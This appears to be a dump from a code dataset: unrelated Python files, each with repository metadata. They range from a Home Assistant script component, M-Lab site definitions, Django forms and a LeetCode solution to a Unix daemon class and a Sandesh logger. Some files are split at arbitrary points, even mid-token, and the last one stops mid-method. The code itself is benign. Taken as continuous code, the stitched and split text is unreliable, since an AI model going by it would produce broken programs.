homeassistant.components.script
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scripts are a sequence of actions that can be triggered manually
by the user or automatically based upon automation events, etc.
"""
import logging
from datetime import timedelta
import homeassistant.util.dt as date_util
import threading
from homeassistant.helpers.event import track_point_in_time
from homeassistant.util import split_entity_id
from homeassistant.const import (
STATE_ON, STATE_OFF, SERVICE_TURN_ON, SERVICE_TURN_OFF, EVENT_TIME_CHANGED)
DOMAIN = "script"
DEPENDENCIES = ["group"]
CONF_ALIAS = "alias"
CONF_SERVICE = "execute_service"
CONF_SERVICE_DATA = "service_data"
CONF_SEQUENCE = "sequence"
CONF_DELAY = "delay"
_LOGGER = logging.getLogger(__name__)
def setup(hass, config):
""" Load the scripts from the configuration. """
scripts = []
for name, cfg in config[DOMAIN].items():
if CONF_SEQUENCE not in cfg:
_LOGGER.warn("Missing key 'sequence' for script %s", name)
continue
alias = cfg.get(CONF_ALIAS, name)
entity_id = "{}.{}".format(DOMAIN, name)
script = Script(hass, entity_id, alias, cfg[CONF_SEQUENCE])
hass.services.register(DOMAIN, name, script)
scripts.append(script)
def turn_on(service):
""" Calls a script. """
for entity_id in service.data['entity_id']:
domain, service = split_entity_id(entity_id)
hass.services.call(domain, service, {})
def turn_off(service):
""" Cancels a script. """
for entity_id in service.data['entity_id']:
for script in scripts:
if script.entity_id == entity_id:
script.cancel()
hass.services.register(DOMAIN, SERVICE_TURN_ON, turn_on)
hass.services.register(DOMAIN, SERVICE_TURN_OFF, turn_off)
return True
class Script(object):
# pylint: disable=attribute-defined-outside-init
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-few-public-methods
"""
A script contains a sequence of service calls or configured delays
that are executed in order.
Each script also has a state (on/off) indicating whether the script is
running or not.
"""
def __init__(self, hass, entity_id, alias, sequence):
self.hass = hass
self.alias = alias
self.sequence = sequence
self.entity_id = entity_id
self._lock = threading.Lock()
self._reset()
def cancel(self):
""" Cancels a running script and resets the state back to off. """
_LOGGER.info("Cancelled script %s", self.alias)
with self._lock:
if self.listener:
self.hass.bus.remove_listener(EVENT_TIME_CHANGED,
self.listener)
self.listener = None
self._reset()
def _reset(self):
""" Resets a script back to default state so that it is ready to
run from the start again. """
self.actions = None
self.listener = None
self.last_action = "Not Running"
self.hass.states.set(self.entity_id, STATE_OFF, {
"friendly_name": self.alias,
"last_action": self.last_action
})
def _execute_until_done(self):
""" Executes a sequence of actions until finished or until a delay
is encountered. If a delay action is encountered, the script
registers itself to be called again in the future, when
_execute_until_done will resume.
Returns True if finished, False
|
otherwise. """
for action in self.actions:
if CONF_SERVICE in action:
self._call_service(action)
elif CONF_DELAY in action:
delay = timedelta(**action[CONF_DELAY])
point_in_time = date_util.now() + delay
self.listener = track_point_in_time(
self.hass, self, point_in_time)
return False
return True
def
|
__call__(self, *args, **kwargs):
""" Executes the script. """
_LOGGER.info("Executing script %s", self.alias)
with self._lock:
if self.actions is None:
self.actions = (action for action in self.sequence)
if not self._execute_until_done():
state = self.hass.states.get(self.entity_id)
state.attributes['last_action'] = self.last_action
self.hass.states.set(self.entity_id, STATE_ON,
state.attributes)
else:
self._reset()
def _call_service(self, action):
""" Calls the service specified in the action. """
self.last_action = action.get(CONF_ALIAS, action[CONF_SERVICE])
_LOGGER.info("Executing script %s step %s", self.alias,
self.last_action)
domain, service = split_entity_id(action[CONF_SERVICE])
data = action.get(CONF_SERVICE_DATA, {})
self.hass.services.call(domain, service, data)
|
m-lab/operator
|
plsync/sites.py
|
Python
|
apache-2.0
| 25,116
| 0.01067
|
#!/usr/bin/python
from planetlab.model import *
from users import user_list
# NOTE: The legacy network remap is used to re-order the automatically
# generated, sequential list of ipaddresses to a legacy order to preserve
# pre-existing slice-and-IP assignments. Otherwise, slices would be assigned
# to new IPs, and for now, we wish to preserve the slice-node-ip mapping.
# An appropriate time to remove this and re-assign IPs to slices would be
# after a major update & reinstallation, such as LXC kernel update.
legacy_network_remap = {}
Network.legacy_network_remap = legacy_network_remap
# name : site prefix, used to generate PL site name, hostnames, etc
# net : v4 & v6 network prefixes and definitions.
# The "arch" parameter of makesite() is a facility that PLC uses to pass the
# correct kernel arguments when booting nodes at a given site. Currently defined
# "arch" values are:
#
# i386 - none
# x86_64 - "noapic acpi=off"
# x86_64-r420 - "pci=nobios acpi=off"
# x86_64-r630 - none
site_list = [
makesite('akl01','163.7.129.0', '2404:138:4009::', 'Auckland', 'NZ', -36.850000, 174.783000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams03','80.239.169.0', '2001:2030:32::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams04','77.67.114.64', '2001:668:1f:5f::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams05','195.89.145.0', '2001:5002:100:21::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ams08','213.244.128.128','2001:4c08:2003:2::', 'Amsterdam', 'NL', 52.308600, 4.763890, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('arn02','195.89.146.192', '2001:5012:100:24::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=Tr
|
ue),
makesite('arn03','213.242.86.64', '2001:4c08:2003:44::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('arn04','62.115.225.128', '2001:2030:0:38::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite(
|
'arn05','77.67.119.64', '2001:668:1f:6a::', 'Stockholm', 'SE', 59.651900, 17.918600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('ath03','193.201.166.128', '2001:648:25e0::', 'Athens', 'GR', 37.936400, 23.944400, user_list, count=4, arch='x86_64-r630', v6gw='2001:648:25e0::129', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl02','38.112.151.64', '2001:550:5b00:1::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl03','64.86.200.192', '2001:5a0:3b02::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl04','173.205.0.192', '2001:668:1f:1c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl07','209.170.91.128', '2001:2030:0:42::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('atl08','4.71.254.128', '2001:1900:3001:c::', 'Atlanta_GA', 'US', 33.636700, -84.428100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bcn01','91.213.30.192', '2001:67c:137c:5::', 'Barcelona', 'ES', 41.297445, 2.081105, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('beg01','188.120.127.0', '2001:7f8:1e:6::', 'Belgrade', 'RS', 44.821600, 20.292100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bom01','125.18.112.64', '2404:a800:2000:217::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bom02','14.143.58.128', '2403:0:100:66::', 'Mumbai', 'IN', 19.088611, 72.868056, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru01','195.89.146.128', '2001:5005:200::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru02','212.3.248.192', '2001:4c08:2003:45::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru03','62.115.229.192', '2001:2030:0:39::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('bru04','77.67.119.0', '2001:668:1f:69::', 'Brussels', 'BE', 50.4974163, 3.3528346, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('cpt01','154.114.19.64', '2001:4200:0:e::', 'Cape_Town', 'ZA', -33.972387,18.601803, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('den02','4.34.58.0', '2001:1900:2200:49::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('den04','128.177.109.64', '2001:438:fffd:2c::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('den05','209.170.120.64', '2001:2030:0:3b::', 'Denver_CO', 'US', 39.856100, -104.673700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw02','64.86.132.64', '2001:5a0:3f00::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw03','4.15.35.128', '2001:1900:2200:44::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw05','128.177.163.64', '2001:438:fffd:30::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw07','209.170.119.128','2001:2030:0:1f::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dfw08','38.107.216.0', '2001:550:2000::', 'Dallas_TX', 'US', 32.896900, -97.038100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('dub01','193.1.12.192', '2001:770:b5::', 'Dublin', 'IE', 53.433300, -6.250000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fln01','200.237.203.0', '2801:80:a88:4006::', 'Florianopolis', 'BR', -27.668455, -48.545998, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fra01','80.239.199.0', '2001:2030:2f::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fra02','77.67.114.0', '2001:668:1f:5e::', 'Frankfurt', 'DE', 50.037932, 8.562151, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True),
makesite('fra03','195.89.146.64', '2001:5001:200:30::', 'Fr
|
inuyasha2012/pypsy
|
demo/demo_grm.py
|
Python
|
mit
| 220
| 0
|
# coding=utf-8
# 项目反应理论中的等级反应模型
from __future__ import divis
|
ion, print_function, unicode_literals
from psy import Grm, data
score
|
s = data['lsat.dat']
grm = Grm(scores=scores)
print(grm.em())
|
feigaochn/leetcode
|
p435_non_overlapping_intervals.py
|
Python
|
mit
| 823
| 0
|
# Definition for an interval.
class Interval:
def __init__(self, s=0, e=0):
self.start = s
self.end = e
class Solution:
def eraseOverlapIntervals(self, intervals):
"""
:type intervals: List[Interval]
:rtype: int
"""
if not intervals:
return
|
0
|
intervals.sort(key=lambda i: (i.end, i.start))
kicks = 0
pre_end = intervals[0].end
for it in intervals[1:]:
if it.start < pre_end:
kicks += 1
else:
pre_end = it.end
return kicks
fn = Solution().eraseOverlapIntervals
print(fn([Interval(*it) for it in [[1, 2], [2, 3], [3, 4], [1, 3]]]))
print(fn([Interval(*it) for it in [[1, 2], [1, 2], [1, 2]]]))
print(fn([Interval(*it) for it in [[1, 2], [2, 3]]]))
|
pythonkr/pyconkr-2014
|
pyconkr/forms.py
|
Python
|
mit
| 1,760
| 0
|
from django import forms
from django.utils.t
|
ranslation import ugettext_lazy as _
from django_summernote.widgets import SummernoteInplaceWidget
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Speaker, Program
class EmailLoginForm(forms.Form):
email = fo
|
rms.EmailField(
max_length=255,
label='',
widget=forms.TextInput(attrs={
'placeholder': 'Email address',
'class': 'form-control',
})
)
def clean(self):
cleaned_data = super(EmailLoginForm, self).clean()
return cleaned_data
class SpeakerForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(SpeakerForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.add_input(Submit('submit', _('Submit')))
class Meta:
model = Speaker
fields = ('desc', 'info', )
widgets = {
'desc': SummernoteInplaceWidget(),
}
labels = {
'desc': _('Profile'),
'info': _('Additional information'),
}
class ProgramForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ProgramForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.add_input(Submit('submit', _('Submit')))
class Meta:
model = Program
fields = ('slide_url', 'video_url', 'is_recordable', 'desc', )
widgets = {
'desc': SummernoteInplaceWidget(),
}
labels = {
'slide_url': _('Slide URL'),
'video_url': _('Video URL'),
'is_recordable': _('Photography and recording is allowed'),
'desc': _('Description'),
}
|
dana-i2cat/felix
|
expedient/src/python/plugins/vt_plugin/models/VtPlugin.py
|
Python
|
apache-2.0
| 3,112
| 0.008676
|
from django.db import models
from django.core.exceptions import MultipleObjectsReturned
from expedient.clearinghouse.aggregate.models import Aggregate
from expedient.common.permissions.shortcuts import must_have_permission
from vt_plugin.models.VM import VM
# Virtualization Plugin class
class VtPlugin(Aggregate):
'''
Virtualization Plugin that communicates the Virtualization Aggregate Manager with Expedient
'''
# VT Aggregate information field
information = "An aggregate of VT servers "
class Meta:
app_label = 'vt_plugin'
verbose_name = "Virtualization Aggregate"
client = models.OneToOneField('xmlrpcServerProxy', editable = False, blank = True, null = True)
#def start_slice(self, slice):
# super(VtPlugin, self).start_slice(slice)
# try:
# from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice
# startStopSlice("start",slice.uuid)
# except:
# raise
def stop_slice(self, slice):
super(VtPlugin, self).stop_slice(slice)
try:
from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice
startStopSlice("stop",slice.uuid)
except:
raise
"""
aggregate.remove_from_project on a VT AM will get here first to check
that no slice inside the project contains VMs for the given aggregate
"""
def remove_from_project(self, project, next):
# Check permission because it won't always call parent method (where permission checks)
must_have_permission("user", self.as_leaf_class(), "can_use_aggregate")
vms = self.resource_set.filter_for_class(VM).filter(vm__projectId=project.uuid)
offending_slices = []
for vm in vms:
offending_slices.append(str(vm.vm.getSliceName()))
# Aggregate has VMs in slices -> stop slices and remove aggregate from there where possible
if offending_slices:
for slice in project.slice_set.all():
try:
|
self.stop_slice(slice)
self.remove_from_slice(slice, next)
except:
pass
raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it from slices %s" % (self.name, str(offending_slices)))
# Aggregate has no VMs in slices (OK) -> delete completely from project (parent method)
else:
return
|
super(VtPlugin, self).remove_from_project(project, next)
"""
aggregate.remove_from_slice on a VT AM will get here first to check
that the slice does not contain VMs for the given aggregate
"""
def remove_from_slice(self, slice, next):
# If any VM (created inside this slice) is found inside any server of the VT AM, warn
if self.resource_set.filter_for_class(VM).filter(vm__sliceId=slice.uuid):
raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it" % str(self.name))
return super(VtPlugin, self).remove_from_slice(slice, next)
|
brandonheller/mediawiki_to_gollum
|
split_by_headers.py
|
Python
|
bsd-3-clause
| 2,218
| 0.002705
|
#!/usr/bin/env python
"""Script to split a large mediawiki file into multiple files, by header."""
import sys
import re
import os
ADD_TOC = True # Add TOC everywhere?
def usage():
print "Usage: [scriptname] [infilename]"
if len(sys.argv) != 2:
usage()
exit()
filename_in = sys.argv[1]
if '.' in filename_in:
filename_no_exts = filename_in[:filename_in.find('.')]
else:
filename_no_exts = filename_in
# Match top-level headers only.
header = re.compile(r"^=([^=]+)=")
current_filename = '' # Set once we see a header, hyphenated
current_filename_orig
|
= '' # Original.
current_text = '' # Build up the next file to write.
file_in = open(filename_in, 'r')
header_names = [] # list of (hyphenated, orig) file name pairs
TOC_FILE = 'Home.mediawiki' # location of intro text before headers + TOC.
def cap_firsts(s):
s_caps = ''
words = s.split(' ')
for j, word in enumerate(words):
words[j] = word[0].upper() + word[1:]
return " ".jo
|
in(words)
first = True
i = 0
for line in file_in.readlines():
m = header.match(line)
if m:
assert len(m.groups()) == 1
# dump string to file.
if first:
filename = TOC_FILE
first = False
else:
filename = current_filename + '.mediawiki'
f = open(filename, 'w')
if ADD_TOC and not filename == TOC_FILE:
f.write("__TOC__\n\n")
f.write(current_text)
f.close()
current_text = ''
# Who knows how Gollum/Mediawiki handle spaces. Convert to hyphens.
current_filename_orig = cap_firsts(m.groups()[0].strip())
current_filename = current_filename_orig.replace(' ', '-')
header_names.append((current_filename, current_filename_orig))
else:
current_text += line
i += 1
# Finish last file
filename = current_filename + '.mediawiki'
f = open(filename, 'w')
f.write(current_text)
f.close()
print "processed %i lines" % i
home_file = open('Home.mediawiki', 'a')
# Dump out the header names to a Home.ext to form a TOC.
for k, (hyphenated, orig) in enumerate(header_names):
# Link | Page Title
home_file.write("%i: [[%s|%s]]\n\n" % (k + 1, hyphenated, orig))
|
cyrilkyburz/bhwi_proxy
|
bhwi_proxy.py
|
Python
|
mit
| 1,516
| 0.019789
|
from flask import Flask, request, jsonify, abort
import os
import requests
app = Flask(__name__)
app.debug = os.getenv('DEBUG', '') == 'True'
def access_token():
return os.getenv('ACCESS_TOKEN', '')
def check_user_id(user_id):
if user_id not in os.getenv('USER_IDS', ''):
return abort(403)
def check_user_name(user_name):
if user_name not in os.getenv('USER_NAMES', ''):
return abort(403)
def perform_request(path):
r = requests.get(path)
response = jsonify(r.json(),
|
status=202)
response.headers.add('Access
|
-Control-Allow-Origin', '*')
return response
def build_recent_images_url(user_id):
return 'https://api.instagram.com/v1/users/' + user_id + '/media/recent/?access_token=' + access_token()
def build_user_profile_url(user_id):
return 'https://api.instagram.com/v1/users/' + user_id + '?access_token=' + access_token()
def build_media_url(user_name):
return 'https://www.instagram.com/' + user_name + '/media/'
@app.route("/recent_images/<path:user_id>")
def recent_images(user_id):
check_user_id(user_id)
return perform_request(build_recent_images_url(user_id))
@app.route("/user_profile/<path:user_id>")
def user_profile(user_id):
check_user_id(user_id)
return perform_request(build_user_profile_url(user_id))
@app.route("/media/<path:user_name>")
def media(user_name):
check_user_name(user_name)
return perform_request(build_media_url(user_name))
@app.route('/healthcheck')
def healthcheck():
return 'WORKING'
if __name__ == "__main__":
app.run()
|
hamgravy/volk-fft
|
python/volk_fft_modtool/cfg.py
|
Python
|
gpl-3.0
| 3,621
| 0.005523
|
#!/usr/bin/env python
#
# Copyright 2013, 2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import ConfigParser
import sys
import os
import exceptions
import re
class volk_fft_modtool_config:
def key_val_sub(self, num, stuff, section):
return re.sub('\$' + 'k' + str(num), stuff[num][0], (re.sub('\$' + str(num), stuff[num][1], section[1][num])));
def verify(self):
for i in self.verification:
self.verify_section(i)
def remap(self):
for i in self.remapification:
self.verify_section(i)
def verify_section(self, section):
stuff = self.cfg.items(section[0])
for i in range(len(section[1])):
eval(self.key_val_sub(i, stuff, section))
try:
val = eval(self.key_val_sub(i, stuff, section))
if val == False:
raise exceptions.ValueError
except ValueError:
raise exceptions.ValueError('Verification function returns False... key:%s, val:%s'%(stuff[i][0], stuff[i][1]))
except:
raise exceptions.IOError('bad configuration... key:%s, val:%s'%(stuff[i][0], stuff[i][1]))
def __init__(self, cfg=None):
self.config_name = 'config'
self.config_defaults = ['name', 'destination', 'base']
self.config_defaults_remap = ['1',
'self.cfg.set(self.config_name, \'$k1\', os.path.realpath(os.path.expanduser(\'$1\')))',
'self.cfg.set(self.config_name, \'$k2\', os.path.realpath(os.path.expanduser(\'$2\')))']
self.config_defaults_verify = ['re.match(\'[a-zA-Z0-9]+$\', \'$0\')',
'os.path.exists(\'$1
|
\')',
'os.path.exists(\'$2\')']
self.remapification = [(self.config_name, self.config_defaults_re
|
map)]
self.verification = [(self.config_name, self.config_defaults_verify)]
default = os.path.join(os.getcwd(), 'volk_fft_modtool.cfg')
icfg = ConfigParser.RawConfigParser()
if cfg:
icfg.read(cfg)
elif os.path.exists(default):
icfg.read(default)
else:
print "Initializing config file..."
icfg.add_section(self.config_name)
for kn in self.config_defaults:
rv = raw_input("%s: "%(kn))
icfg.set(self.config_name, kn, rv)
self.cfg = icfg
self.remap()
self.verify()
def read_map(self, name, inp):
if self.cfg.has_section(name):
self.cfg.remove_section(name)
self.cfg.add_section(name)
for i in inp:
self.cfg.set(name, i, inp[i])
def get_map(self, name):
retval = {}
stuff = self.cfg.items(name)
for i in stuff:
retval[i[0]] = i[1]
return retval
|
marshallflax/NVDARemoteServer
|
daemon.py
|
Python
|
gpl-2.0
| 3,540
| 0.051695
|
import sys, os, time, atexit
from signal import SIGTERM, SIGKILL
class Daemon:
"""
A generic daemon class.
Usage: subclass the Daemon class and override the run() method
"""
def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = pidfile
def daemonize(self):
"""
do the UNIX double-fork magic, see Stevens' "Advanced
Programming in the UNIX Environment" for details (ISBN 0201563177)
http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
"""
try:
pid = os.fork()
if pid > 0:
# exit first parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent
sys.exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
sys.exit(1)
# redirect standard file descriptors
sys.stdout.flush()
sys.stderr.flush()
si = file(self.stdin, 'r')
so = file(self.stdout, 'a+')
se = file(self.stderr, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# write pidfile
atexit.register(self.delpid)
pid = str(os.getpid())
file(self.pidfile,'w+').write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exist. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the
|
daemon
self.daemonize()
self.run()
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.std
|
err.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def kill(self):
"""
Force kill of daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGKILL)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def restart(self):
"""
Restart the daemon
"""
self.stop()
self.start()
def run(self):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
"""
|
prawn-cake/pilvi
|
pilvi/urls.py
|
Python
|
mit
| 762
| 0
|
"""pilvi URL Configuration
The `urlpatterns` list routes URLs to views. For more information
|
please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_a
|
pp.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
]
|
cprogrammer1994/Python-ComputeShader
|
Prepare.py
|
Python
|
gpl-3.0
| 121
| 0.024793
|
import
|
os, shutil
if not os.path.isdir('Bin'):
os.mkdir('Bin')
if not os.path.isdir('Temp'):
os.mkdir('Tem
|
p')
|
toabctl/contrail-sandesh
|
library/python/pysandesh/sandesh_logger.py
|
Python
|
apache-2.0
| 6,516
| 0
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# Sandesh Logger
#
import logging
import logging.config
import logging.handlers
from gen_py.sandesh.ttypes import SandeshLevel
import sandesh_base_logger
import util
def create_logger(generator, logger_class, logger_config_file=None):
l_class = util.import_class(logger_class)
return l_class(generator, logger_config_file=logger_config_file)
class SandeshConfigLogger(sandesh_base_logger.SandeshBaseLogger):
"""Sandesh Config Logger Implementation.
This class sets the log config file to the python logging module.
The user should define the log config file as per format defined in [1].
[1] https://docs.python.org/2/library/logging.config.html
"""
def __init__(self, generator, logger_config_file=None):
super(SandeshConfigLogger, self).__init__(generator)
logging.config.fileConfig(logger_config_file)
self._logger = logging.getLogger(generator)
class SandeshLogger(sandesh_base_logger.SandeshBaseLogger):
"""Sandesh Logger Implementation."""
_DEFAULT_LOG_FILE = '<stdout>'
_DEFAULT_SYSLOG_FACILITY = 'LOG_LOCAL0'
def __init__(self, generator, logger_config_file=None):
assert generator, 'SandeshLogger init requires generator name'
super(SandeshLogger, self).__init__(generator)
self._generator = generator
self._logger = logging.getLogger(self._generator)
self._logger.setLevel(
sandesh_base_logger.SandeshBaseLogger.get_py_logger_level(
SandeshLevel.SYS_INFO))
if not len(self._logger.handlers):
# add the handler only once
self._logging_file_handler = logging.StreamHandler()
log_format = logging.Formatter(
'%(asctime)s [%(name)s]: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
self._logging_file_handler.setFormatter(log_format)
self._logger.addHandler(self._logging_file_handler)
else:
self._logging_file_handler = self._logger.handlers[0]
# end __init__
def set_logging_params(self, enable_local_log=False, category='',
level=SandeshLevel.SYS_INFO, file=_DEFAULT_LOG_FILE,
enable_syslog=False, syslog_facility='LOG_LOCAL0',
enable_trace_print=False, enable_flow_log=False):
self.set_local_logging(enable_local_log)
self.set_logging_category(category)
self.set_logging_level(level)
self.set_logging_file(file)
self.set_logging_syslog(enable_syslog, syslog_facility)
self.set_trace_print(enable_trace_print)
self.set_flow_logging(enable_flow_log)
# end set_logging_params
def set_trace_print(self, enable_trace_print):
if self.is_trace_print_enabled() != enable_trace_print:
self._logger.info('SANDESH: Trace: PRINT: [%s] -> [%s]',
self.is_trace_print_enabled(),
enable_trace_print)
super(SandeshLogger, self).set_trace_print(enable_trace_print)
# end set_trace_print
def set_flow_logging(self, enable_flow_log):
if self.is_flow_logging_enabled() != enable_flow_log:
self._logger.info('SANDESH: Flow Logging: [%s] -> [%s]',
self.is_flow_logging_enabled(),
enable_flow_log)
super(SandeshLogger, self).set_flow_logging(enable_flow_log)
# end set_flow_logging
def set_logging_level(self, level):
if isinstance(level, str):
if level in SandeshLevel._NAMES_TO_VALUES:
level = SandeshLevel._NAMES_TO_VALUES[level]
else:
level = SandeshLevel.SYS_INFO
# get logging level corresponding to sandesh level
try:
logger_level = self._SANDESH_LEVEL_TO_LOGGER_LEVEL[level]
except KeyError:
logger_level = logging.INFO
level = SandeshLevel.SYS_INFO
self._logger.info('SANDESH: Logging: LEVEL: [%s] -> [%s]',
SandeshLevel._VALUES_TO_NAMES[self.logging_level()],
SandeshLevel._VALUES_TO_NAMES[level])
self._logger.setLevel(logger_level)
super(SandeshLogger, self).set_logging_level(level)
# end set_logging_level
def set_logging_file(self, file):
if self.logging_file() != file:
self._logger.info('SANDESH: Logging: FILE: [%s] -> [%s]',
self.logging_file(), file)
